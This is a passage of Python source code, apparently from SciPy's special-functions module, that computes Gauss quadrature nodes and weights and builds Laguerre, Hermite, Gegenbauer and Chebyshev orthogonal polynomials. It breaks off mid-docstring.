def roots_genlaguerre(n, alpha, mu=False):
r"""Gauss-generalized Laguerre quadrature.
Computes the sample points and weights for Gauss-generalized Laguerre
quadrature. The sample points are the roots of the n-th degree generalized
Laguerre polynomial, :math:`L^{\alpha}_n(x)`. These sample points and
weights correctly integrate polynomials of degree :math:`2n - 1` or less
over the interval :math:`[0, \infty]` with weight function
:math:`f(x) = x^{\alpha} e^{-x}`.
Parameters
----------
n : int
quadrature order
alpha : float
alpha must be > -1
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
if alpha < -1:
raise ValueError("alpha must be greater than -1.")
mu0 = cephes.gamma(alpha + 1)
if m == 1:
x = np.array([alpha+1.0], 'd')
w = np.array([mu0], 'd')
if mu:
return x, w, mu0
else:
return x, w
an_func = lambda k: 2 * k + alpha + 1
bn_func = lambda k: -np.sqrt(k * (k + alpha))
f = lambda n, x: cephes.eval_genlaguerre(n, alpha, x)
df = lambda n, x: (n*cephes.eval_genlaguerre(n, alpha, x)
- (n + alpha)*cephes.eval_genlaguerre(n-1, alpha, x))/x
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, False, mu)
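# Illustrative check (doctest-style sketch): a two-point rule with alpha = 0
# integrates x**3 * exp(-x) over [0, inf) exactly; the value is 3! = 6.
#     >>> x, w = roots_genlaguerre(2, 0.0)
#     >>> np.allclose(np.sum(w * x**3), 6.0)
#     True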
def genlaguerre(n, alpha, monic=False):
r"""Generalized (associated) Laguerre polynomial.
Defined to be the solution of
.. math::
x\frac{d^2}{dx^2}L_n^{(\alpha)}
+ (\alpha + 1 - x)\frac{d}{dx}L_n^{(\alpha)}
+ nL_n^{(\alpha)} = 0,
where :math:`\alpha > -1`; :math:`L_n^{(\alpha)}` is a polynomial
of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
alpha : float
Parameter, must be greater than -1.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
L : orthopoly1d
Generalized Laguerre polynomial.
Notes
-----
For fixed :math:`\alpha`, the polynomials :math:`L_n^{(\alpha)}`
are orthogonal over :math:`[0, \infty)` with weight function
:math:`e^{-x}x^\alpha`.
The Laguerre polynomials are the special case where :math:`\alpha
= 0`.
See Also
--------
laguerre : Laguerre polynomial.
"""
if alpha <= -1:
raise ValueError("alpha must be > -1")
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_genlaguerre(n1, alpha, mu=True)
wfunc = lambda x: exp(-x) * x**alpha
if n == 0:
x, w = [], []
hn = _gam(n + alpha + 1) / _gam(n + 1)
kn = (-1)**n / _gam(n + 1)
p = orthopoly1d(x, w, hn, kn, wfunc, (0, inf), monic,
lambda x: eval_genlaguerre(n, alpha, x))
return p
# Laguerre L_n(x)
def roots_laguerre(n, mu=False):
r"""Gauss-Laguerre quadrature.
Computes the sample points and weights for Gauss-Laguerre quadrature.
The sample points are the roots of the n-th degree Laguerre polynomial,
:math:`L_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[0, \infty]` with weight function :math:`f(x) = e^{-x}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.laguerre.laggauss
"""
return roots_genlaguerre(n, 0.0, mu=mu)
def laguerre(n, monic=False):
r"""Laguerre polynomial.
Defined to be the solution of
.. math::
x\frac{d^2}{dx^2}L_n + (1 - x)\frac{d}{dx}L_n + nL_n = 0;
:math:`L_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
L : orthopoly1d
Laguerre Polynomial.
Notes
-----
The polynomials :math:`L_n` are orthogonal over :math:`[0,
\infty)` with weight function :math:`e^{-x}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_laguerre(n1, mu=True)
if n == 0:
x, w = [], []
hn = 1.0
kn = (-1)**n / _gam(n + 1)
p = orthopoly1d(x, w, hn, kn, lambda x: exp(-x), (0, inf), monic,
lambda x: eval_laguerre(n, x))
return p
# Hermite 1 H_n(x)
def roots_hermite(n, mu=False):
r"""Gauss-Hermite (physicst's) quadrature.
Computes the sample points and weights for Gauss-Hermite quadrature.
The sample points are the roots of the n-th degree Hermite polynomial,
:math:`H_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-\infty, \infty]` with weight function :math:`f(x) = e^{-x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
Notes
-----
For small n up to 150 a modified version of the Golub-Welsch
algorithm is used. Nodes are computed from the eigenvalue
problem and improved by one step of a Newton iteration.
The weights are computed from the well-known analytical formula.
For n larger than 150 an optimal asymptotic algorithm is applied
which computes nodes and weights in a numerically stable manner.
The algorithm has linear runtime making computation for very
large n (several thousand or more) feasible.
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.hermite.hermgauss
roots_hermitenorm
References
----------
.. [townsend.trogdon.olver-2014]
Townsend, A. and Trogdon, T. and Olver, S. (2014)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*. :arXiv:`1410.5286`.
.. [townsend.trogdon.olver-2015]
Townsend, A. and Trogdon, T. and Olver, S. (2015)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*.
IMA Journal of Numerical Analysis
:doi:`10.1093/imanum/drv002`.
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
mu0 = np.sqrt(np.pi)
if n <= 150:
an_func = lambda k: 0.0*k
bn_func = lambda k: np.sqrt(k/2.0)
f = cephes.eval_hermite
df = lambda n, x: 2.0 * n * cephes.eval_hermite(n-1, x)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
else:
nodes, weights = _roots_hermite_asy(m)
if mu:
return nodes, weights, mu0
else:
return nodes, weights
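# Illustrative check (doctest-style sketch): the second moment of exp(-x**2)
# is sqrt(pi)/2 and is reproduced exactly for any order n >= 2.
#     >>> x, w = roots_hermite(5)
#     >>> np.allclose(np.sum(w * x**2), np.sqrt(np.pi) / 2)
#     True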
def _compute_tauk(n, k, maxit=5):
"""Helper function for Tricomi initial guesses
For details, see formula 3.1 in lemma 3.1 in the
original paper.
Parameters
----------
n : int
Quadrature order
k : ndarray of type int
Index of roots :math:`\tau_k` to compute
maxit : int
        Number of Newton iterations performed; the default
        value of 5 is sufficient.
Returns
-------
tauk : ndarray
Roots of equation 3.1
See Also
--------
initial_nodes_a
roots_hermite_asy
"""
a = n % 2 - 0.5
c = (4.0*floor(n/2.0) - 4.0*k + 3.0)*pi / (4.0*floor(n/2.0) + 2.0*a + 2.0)
f = lambda x: x - sin(x) - c
df = lambda x: 1.0 - cos(x)
xi = 0.5*pi
for i in range(maxit):
xi = xi - f(xi)/df(xi)
return xi
def _initial_nodes_a(n, k):
r"""Tricomi initial guesses
Computes an initial approximation to the square of the `k`-th
(positive) root :math:`x_k` of the Hermite polynomial :math:`H_n`
of order :math:`n`. The formula is the one from lemma 3.1 in the
original paper. The guesses are accurate except in the region
near :math:`\sqrt{2n + 1}`.
Parameters
----------
n : int
Quadrature order
k : ndarray of type int
Index of roots to compute
Returns
-------
xksq : ndarray
Square of the approximate roots
See Also
--------
initial_nodes
roots_hermite_asy
"""
tauk = _compute_tauk(n, k)
sigk = cos(0.5*tauk)**2
a = n % 2 - 0.5
nu = 4.0*floor(n/2.0) + 2.0*a + 2.0
# Initial approximation of Hermite roots (square)
xksq = nu*sigk - 1.0/(3.0*nu) * (5.0/(4.0*(1.0-sigk)**2) - 1.0/(1.0-sigk) - 0.25)
return xksq
def _initial_nodes_b(n, k):
r"""Gatteschi initial guesses
Computes an initial approximation to the square of the `k`-th
(positive) root :math:`x_k` of the Hermite polynomial :math:`H_n`
of order :math:`n`. The formula is the one from lemma 3.2 in the
original paper. The guesses are accurate in the region just
below :math:`\sqrt{2n + 1}`.
Parameters
----------
n : int
Quadrature order
k : ndarray of type int
Index of roots to compute
Returns
-------
xksq : ndarray
Square of the approximate root
See Also
--------
initial_nodes
roots_hermite_asy
"""
a = n % 2 - 0.5
nu = 4.0*floor(n/2.0) + 2.0*a + 2.0
# Airy roots by approximation
ak = specfun.airyzo(k.max(), 1)[0][::-1]
# Initial approximation of Hermite roots (square)
xksq = (nu +
2.0**(2.0/3.0) * ak * nu**(1.0/3.0) +
1.0/5.0 * 2.0**(4.0/3.0) * ak**2 * nu**(-1.0/3.0) +
(9.0/140.0 - 12.0/175.0 * ak**3) * nu**(-1.0) +
(16.0/1575.0 * ak + 92.0/7875.0 * ak**4) * 2.0**(2.0/3.0) * nu**(-5.0/3.0) -
(15152.0/3031875.0 * ak**5 + 1088.0/121275.0 * ak**2) * 2.0**(1.0/3.0) * nu**(-7.0/3.0))
return xksq
def _initial_nodes(n):
"""Initial guesses for the Hermite roots
Computes an initial approximation to the non-negative
roots :math:`x_k` of the Hermite polynomial :math:`H_n`
of order :math:`n`. The Tricomi and Gatteschi initial
guesses are used in the region where they are accurate.
Parameters
----------
n : int
Quadrature order
Returns
-------
xk : ndarray
Approximate roots
See Also
--------
roots_hermite_asy
"""
# Turnover point
# linear polynomial fit to error of 10, 25, 40, ..., 1000 point rules
fit = 0.49082003*n - 4.37859653
turnover = around(fit).astype(int)
# Compute all approximations
ia = arange(1, int(floor(n*0.5)+1))
ib = ia[::-1]
xasq = _initial_nodes_a(n, ia[:turnover+1])
xbsq = _initial_nodes_b(n, ib[turnover+1:])
# Combine
iv = sqrt(hstack([xasq, xbsq]))
# Central node is always zero
if n % 2 == 1:
iv = hstack([0.0, iv])
return iv
def _pbcf(n, theta):
r"""Asymptotic series expansion of parabolic cylinder function
The implementation is based on sections 3.2 and 3.3 from the
original paper. Compared to the published version this code
adds one more term to the asymptotic series. The detailed
formulas can be found at [parabolic-asymptotics]_. The evaluation
is done in a transformed variable :math:`\theta := \arccos(t)`
where :math:`t := x / \mu` and :math:`\mu := \sqrt{2n + 1}`.
Parameters
----------
n : int
Quadrature order
theta : ndarray
Transformed position variable
Returns
-------
U : ndarray
Value of the parabolic cylinder function :math:`U(a, \theta)`.
Ud : ndarray
Value of the derivative :math:`U^{\prime}(a, \theta)` of
the parabolic cylinder function.
See Also
--------
roots_hermite_asy
References
----------
.. [parabolic-asymptotics]
http://dlmf.nist.gov/12.10#vii
"""
st = sin(theta)
ct = cos(theta)
# http://dlmf.nist.gov/12.10#vii
mu = 2.0*n + 1.0
# http://dlmf.nist.gov/12.10#E23
eta = 0.5*theta - 0.5*st*ct
# http://dlmf.nist.gov/12.10#E39
zeta = -(3.0*eta/2.0) ** (2.0/3.0)
# http://dlmf.nist.gov/12.10#E40
phi = (-zeta / st**2) ** (0.25)
# Coefficients
# http://dlmf.nist.gov/12.10#E43
a0 = 1.0
a1 = 0.10416666666666666667
a2 = 0.08355034722222222222
a3 = 0.12822657455632716049
a4 = 0.29184902646414046425
a5 = 0.88162726744375765242
b0 = 1.0
b1 = -0.14583333333333333333
b2 = -0.09874131944444444444
b3 = -0.14331205391589506173
b4 = -0.31722720267841354810
b5 = -0.94242914795712024914
# Polynomials
# http://dlmf.nist.gov/12.10#E9
# http://dlmf.nist.gov/12.10#E10
ctp = ct ** arange(16).reshape((-1,1))
u0 = 1.0
u1 = (1.0*ctp[3,:] - 6.0*ct) / 24.0
u2 = (-9.0*ctp[4,:] + 249.0*ctp[2,:] + 145.0) / 1152.0
u3 = (-4042.0*ctp[9,:] + 18189.0*ctp[7,:] - 28287.0*ctp[5,:] - 151995.0*ctp[3,:] - 259290.0*ct) / 414720.0
u4 = (72756.0*ctp[10,:] - 321339.0*ctp[8,:] - 154982.0*ctp[6,:] + 50938215.0*ctp[4,:] + 122602962.0*ctp[2,:] + 12773113.0) / 39813120.0
u5 = (82393456.0*ctp[15,:] - 617950920.0*ctp[13,:] + 1994971575.0*ctp[11,:] - 3630137104.0*ctp[9,:] + 4433574213.0*ctp[7,:]
- 37370295816.0*ctp[5,:] - 119582875013.0*ctp[3,:] - 34009066266.0*ct) / 6688604160.0
v0 = 1.0
v1 = (1.0*ctp[3,:] + 6.0*ct) / 24.0
v2 = (15.0*ctp[4,:] - 327.0*ctp[2,:] - 143.0) / 1152.0
v3 = (-4042.0*ctp[9,:] + 18189.0*ctp[7,:] - 36387.0*ctp[5,:] + 238425.0*ctp[3,:] + 259290.0*ct) / 414720.0
v4 = (-121260.0*ctp[10,:] + 551733.0*ctp[8,:] - 151958.0*ctp[6,:] - 57484425.0*ctp[4,:] - 132752238.0*ctp[2,:] - 12118727) / 39813120.0
v5 = (82393456.0*ctp[15,:] - 617950920.0*ctp[13,:] + 2025529095.0*ctp[11,:] - 3750839308.0*ctp[9,:] + 3832454253.0*ctp[7,:]
+ 35213253348.0*ctp[5,:] + 130919230435.0*ctp[3,:] + 34009066266*ct) / 6688604160.0
# Airy Evaluation (Bi and Bip unused)
Ai, Aip, Bi, Bip = airy(mu**(4.0/6.0) * zeta)
# Prefactor for U
P = 2.0*sqrt(pi) * mu**(1.0/6.0) * phi
# Terms for U
# http://dlmf.nist.gov/12.10#E42
phip = phi ** arange(6, 31, 6).reshape((-1,1))
A0 = b0*u0
A1 = (b2*u0 + phip[0,:]*b1*u1 + phip[1,:]*b0*u2) / zeta**3
A2 = (b4*u0 + phip[0,:]*b3*u1 + phip[1,:]*b2*u2 + phip[2,:]*b1*u3 + phip[3,:]*b0*u4) / zeta**6
B0 = -(a1*u0 + phip[0,:]*a0*u1) / zeta**2
B1 = -(a3*u0 + phip[0,:]*a2*u1 + phip[1,:]*a1*u2 + phip[2,:]*a0*u3) / zeta**5
B2 = -(a5*u0 + phip[0,:]*a4*u1 + phip[1,:]*a3*u2 + phip[2,:]*a2*u3 + phip[3,:]*a1*u4 + phip[4,:]*a0*u5) / zeta**8
# U
# http://dlmf.nist.gov/12.10#E35
U = P * (Ai * (A0 + A1/mu**2.0 + A2/mu**4.0) +
Aip * (B0 + B1/mu**2.0 + B2/mu**4.0) / mu**(8.0/6.0))
# Prefactor for derivative of U
Pd = sqrt(2.0*pi) * mu**(2.0/6.0) / phi
# Terms for derivative of U
# http://dlmf.nist.gov/12.10#E46
C0 = -(b1*v0 + phip[0,:]*b0*v1) / zeta
C1 = -(b3*v0 + phip[0,:]*b2*v1 + phip[1,:]*b1*v2 + phip[2,:]*b0*v3) / zeta**4
C2 = -(b5*v0 + phip[0,:]*b4*v1 + phip[1,:]*b3*v2 + phip[2,:]*b2*v3 + phip[3,:]*b1*v4 + phip[4,:]*b0*v5) / zeta**7
D0 = a0*v0
D1 = (a2*v0 + phip[0,:]*a1*v1 + phip[1,:]*a0*v2) / zeta**3
D2 = (a4*v0 + phip[0,:]*a3*v1 + phip[1,:]*a2*v2 + phip[2,:]*a1*v3 + phip[3,:]*a0*v4) / zeta**6
# Derivative of U
# http://dlmf.nist.gov/12.10#E36
Ud = Pd * (Ai * (C0 + C1/mu**2.0 + C2/mu**4.0) / mu**(4.0/6.0) +
Aip * (D0 + D1/mu**2.0 + D2/mu**4.0))
return U, Ud
def _newton(n, x_initial, maxit=5):
"""Newton iteration for polishing the asymptotic approximation
to the zeros of the Hermite polynomials.
Parameters
----------
n : int
Quadrature order
x_initial : ndarray
Initial guesses for the roots
maxit : int
Maximal number of Newton iterations.
        The default 5 is sufficient; usually
        only one or two steps are needed.
Returns
-------
nodes : ndarray
Quadrature nodes
weights : ndarray
Quadrature weights
See Also
--------
roots_hermite_asy
"""
# Variable transformation
mu = sqrt(2.0*n + 1.0)
t = x_initial / mu
theta = arccos(t)
# Newton iteration
for i in range(maxit):
u, ud = _pbcf(n, theta)
dtheta = u / (sqrt(2.0) * mu * sin(theta) * ud)
theta = theta + dtheta
if max(abs(dtheta)) < 1e-14:
break
# Undo variable transformation
x = mu * cos(theta)
# Central node is always zero
if n % 2 == 1:
x[0] = 0.0
# Compute weights
w = exp(-x**2) / (2.0*ud**2)
return x, w
def _roots_hermite_asy(n):
r"""Gauss-Hermite (physicst's) quadrature for large n.
Computes the sample points and weights for Gauss-Hermite quadrature.
The sample points are the roots of the n-th degree Hermite polynomial,
:math:`H_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-\infty, \infty]` with weight function :math:`f(x) = e^{-x^2}`.
This method relies on asymptotic expansions which work best for n > 150.
The algorithm has linear runtime making computation for very large n
feasible.
Parameters
----------
n : int
quadrature order
Returns
-------
nodes : ndarray
Quadrature nodes
weights : ndarray
Quadrature weights
See Also
--------
roots_hermite
References
----------
.. [townsend.trogdon.olver-2014]
Townsend, A. and Trogdon, T. and Olver, S. (2014)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*. :arXiv:`1410.5286`.
.. [townsend.trogdon.olver-2015]
Townsend, A. and Trogdon, T. and Olver, S. (2015)
*Fast computation of Gauss quadrature nodes and
weights on the whole real line*.
IMA Journal of Numerical Analysis
:doi:`10.1093/imanum/drv002`.
"""
iv = _initial_nodes(n)
nodes, weights = _newton(n, iv)
# Combine with negative parts
if n % 2 == 0:
nodes = hstack([-nodes[::-1], nodes])
weights = hstack([weights[::-1], weights])
else:
nodes = hstack([-nodes[-1:0:-1], nodes])
weights = hstack([weights[-1:0:-1], weights])
# Scale weights
weights *= sqrt(pi) / sum(weights)
return nodes, weights
def hermite(n, monic=False):
r"""Physicist's Hermite polynomial.
Defined by
.. math::
H_n(x) = (-1)^ne^{x^2}\frac{d^n}{dx^n}e^{-x^2};
:math:`H_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
H : orthopoly1d
Hermite polynomial.
Notes
-----
The polynomials :math:`H_n` are orthogonal over :math:`(-\infty,
\infty)` with weight function :math:`e^{-x^2}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_hermite(n1, mu=True)
wfunc = lambda x: exp(-x * x)
if n == 0:
x, w = [], []
hn = 2**n * _gam(n + 1) * sqrt(pi)
kn = 2**n
p = orthopoly1d(x, w, hn, kn, wfunc, (-inf, inf), monic,
lambda x: eval_hermite(n, x))
return p
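# Illustrative check (doctest-style sketch): H_3(x) = 8x**3 - 12x, so the
# returned orthopoly1d carries those coefficients.
#     >>> np.allclose(hermite(3).coeffs, [8.0, 0.0, -12.0, 0.0])
#     True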
# Hermite 2 He_n(x)
def roots_hermitenorm(n, mu=False):
r"""Gauss-Hermite (statistician's) quadrature.
Computes the sample points and weights for Gauss-Hermite quadrature.
The sample points are the roots of the n-th degree Hermite polynomial,
:math:`He_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-\infty, \infty]` with weight function :math:`f(x) = e^{-x^2/2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
Notes
-----
For small n up to 150 a modified version of the Golub-Welsch
algorithm is used. Nodes are computed from the eigenvalue
problem and improved by one step of a Newton iteration.
The weights are computed from the well-known analytical formula.
    For n larger than 150 an optimal asymptotic algorithm is used
    which computes nodes and weights in a numerically stable manner.
The algorithm has linear runtime making computation for very
large n (several thousand or more) feasible.
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.hermite_e.hermegauss
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
mu0 = np.sqrt(2.0*np.pi)
if n <= 150:
an_func = lambda k: 0.0*k
bn_func = lambda k: np.sqrt(k)
f = cephes.eval_hermitenorm
df = lambda n, x: n * cephes.eval_hermitenorm(n-1, x)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
else:
nodes, weights = _roots_hermite_asy(m)
# Transform
nodes *= sqrt(2)
weights *= sqrt(2)
if mu:
return nodes, weights, mu0
else:
return nodes, weights
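# Illustrative check (doctest-style sketch): the second moment of exp(-x**2/2)
# equals sqrt(2*pi) and is integrated exactly.
#     >>> x, w = roots_hermitenorm(3)
#     >>> np.allclose(np.sum(w * x**2), np.sqrt(2 * np.pi))
#     True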
def hermitenorm(n, monic=False):
r"""Normalized (probabilist's) Hermite polynomial.
Defined by
.. math::
He_n(x) = (-1)^ne^{x^2/2}\frac{d^n}{dx^n}e^{-x^2/2};
:math:`He_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
He : orthopoly1d
Hermite polynomial.
Notes
-----
The polynomials :math:`He_n` are orthogonal over :math:`(-\infty,
\infty)` with weight function :math:`e^{-x^2/2}`.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_hermitenorm(n1, mu=True)
wfunc = lambda x: exp(-x * x / 2.0)
if n == 0:
x, w = [], []
hn = sqrt(2 * pi) * _gam(n + 1)
kn = 1.0
p = orthopoly1d(x, w, hn, kn, wfunc=wfunc, limits=(-inf, inf), monic=monic,
eval_func=lambda x: eval_hermitenorm(n, x))
return p
# The remainder of the polynomials can be derived from the ones above.
# Ultraspherical (Gegenbauer) C^(alpha)_n(x)
def roots_gegenbauer(n, alpha, mu=False):
r"""Gauss-Gegenbauer quadrature.
Computes the sample points and weights for Gauss-Gegenbauer quadrature.
The sample points are the roots of the n-th degree Gegenbauer polynomial,
:math:`C^{\alpha}_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function
:math:`f(x) = (1 - x^2)^{\alpha - 1/2}`.
Parameters
----------
n : int
quadrature order
alpha : float
alpha must be > -0.5
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
if alpha < -0.5:
raise ValueError("alpha must be greater than -0.5.")
elif alpha == 0.0:
# C(n,0,x) == 0 uniformly, however, as alpha->0, C(n,alpha,x)->T(n,x)
# strictly, we should just error out here, since the roots are not
# really defined, but we used to return something useful, so let's
# keep doing so.
return roots_chebyt(n, mu)
mu0 = np.sqrt(np.pi) * cephes.gamma(alpha + 0.5) / cephes.gamma(alpha + 1)
an_func = lambda k: 0.0 * k
bn_func = lambda k: np.sqrt(k * (k + 2 * alpha - 1)
/ (4 * (k + alpha) * (k + alpha - 1)))
f = lambda n, x: cephes.eval_gegenbauer(n, alpha, x)
df = lambda n, x: (-n*x*cephes.eval_gegenbauer(n, alpha, x)
+ (n + 2*alpha - 1)*cephes.eval_gegenbauer(n-1, alpha, x))/(1-x**2)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
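# Illustrative check (doctest-style sketch): for alpha = 1 the weight is
# sqrt(1 - x**2), and the integral of x**2 * sqrt(1 - x**2) over [-1, 1] is pi/8.
#     >>> x, w = roots_gegenbauer(3, 1.0)
#     >>> np.allclose(np.sum(w * x**2), np.pi / 8)
#     True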
def gegenbauer(n, alpha, monic=False):
r"""Gegenbauer (ultraspherical) polynomial.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}C_n^{(\alpha)}
- (2\alpha + 1)x\frac{d}{dx}C_n^{(\alpha)}
+ n(n + 2\alpha)C_n^{(\alpha)} = 0
for :math:`\alpha > -1/2`; :math:`C_n^{(\alpha)}` is a polynomial
of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
C : orthopoly1d
Gegenbauer polynomial.
Notes
-----
The polynomials :math:`C_n^{(\alpha)}` are orthogonal over
:math:`[-1,1]` with weight function :math:`(1 - x^2)^{(\alpha -
1/2)}`.
"""
base = jacobi(n, alpha - 0.5, alpha - 0.5, monic=monic)
if monic:
return base
    # Abramowitz and Stegun 22.5.20
factor = (_gam(2*alpha + n) * _gam(alpha + 0.5) /
_gam(2*alpha) / _gam(alpha + 0.5 + n))
base._scale(factor)
base.__dict__['_eval_func'] = lambda x: eval_gegenbauer(float(n), alpha, x)
return base
# Chebyshev of the first kind: T_n(x) =
# n! sqrt(pi) / _gam(n+1./2)* P^(-1/2,-1/2)_n(x)
# Computed anew.
def roots_chebyt(n, mu=False):
r"""Gauss-Chebyshev (first kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the first kind, :math:`T_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function :math:`f(x) = 1/\sqrt{1 - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.chebyshev.chebgauss
"""
m = int(n)
if n < 1 or n != m:
raise ValueError('n must be a positive integer.')
x = np.cos(np.arange(2 * m - 1, 0, -2) * pi / (2 * m))
w = np.empty_like(x)
w.fill(pi/m)
if mu:
return x, w, pi
else:
return x, w
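# Illustrative check (doctest-style sketch): with weight 1/sqrt(1 - x**2) the
# integral of x**2 over [-1, 1] is pi/2.
#     >>> x, w = roots_chebyt(4)
#     >>> np.allclose(np.sum(w * x**2), np.pi / 2)
#     True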
def chebyt(n, monic=False):
r"""Chebyshev polynomial of the first kind.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}T_n - x\frac{d}{dx}T_n + n^2T_n = 0;
:math:`T_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
T : orthopoly1d
Chebyshev polynomial of the first kind.
Notes
-----
The polynomials :math:`T_n` are orthogonal over :math:`[-1, 1]`
with weight function :math:`(1 - x^2)^{-1/2}`.
See Also
--------
chebyu : Chebyshev polynomial of the second kind.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: 1.0 / sqrt(1 - x * x)
if n == 0:
return orthopoly1d([], [], pi, 1.0, wfunc, (-1, 1), monic,
lambda x: eval_chebyt(n, x))
n1 = n
x, w, mu = roots_chebyt(n1, mu=True)
hn = pi / 2
kn = 2**(n - 1)
p = orthopoly1d(x, w, hn, kn, wfunc, (-1, 1), monic,
lambda x: eval_chebyt(n, x))
return p
# Chebyshev of the second kind
# U_n(x) = (n+1)! sqrt(pi) / (2*_gam(n+3./2)) * P^(1/2,1/2)_n(x)
def roots_chebyu(n, mu=False):
r"""Gauss-Chebyshev (second kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the second kind, :math:`U_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function :math:`f(x) = \sqrt{1 - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
m = int(n)
if n < 1 or n != m:
raise ValueError('n must be a positive integer.')
t = np.arange(m, 0, -1) * pi / (m + 1)
x = np.cos(t)
w = pi * np.sin(t)**2 / (m + 1)
if mu:
return x, w, pi / 2
else:
return x, w
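# Illustrative check (doctest-style sketch): with weight sqrt(1 - x**2) the
# integral of x**4 over [-1, 1] is pi/16.
#     >>> x, w = roots_chebyu(3)
#     >>> np.allclose(np.sum(w * x**4), np.pi / 16)
#     True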
def chebyu(n, monic=False):
r"""Chebyshev polynomial of the second kind.
Defined to be the solution of
.. math::
(1 - x^2)\frac{d^2}{dx^2}U_n - 3x\frac{d}{dx}U_n
+ n(n + 2)U_n = 0;
:math:`U_n` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
U : orthopoly1d
Chebyshev polynomial of the second kind.
Notes
-----
The polynomials :math:`U_n` are orthogonal over :math:`[-1, 1]`
with weight function :math:`(1 - x^2)^{1/2}`.
See Also
--------
chebyt : Chebyshev polynomial of the first kind.
"""
base = jacobi(n, 0.5, 0.5, monic=monic)
if monic:
return base
factor = sqrt(pi) / 2.0 * _gam(n + 2) / _gam(n + 1.5)
base._scale(factor)
return base
# Chebyshev of the first kind C_n(x)
def roots_chebyc(n, mu=False):
r"""Gauss-Chebyshev (first kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the first kind, :math:`C_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
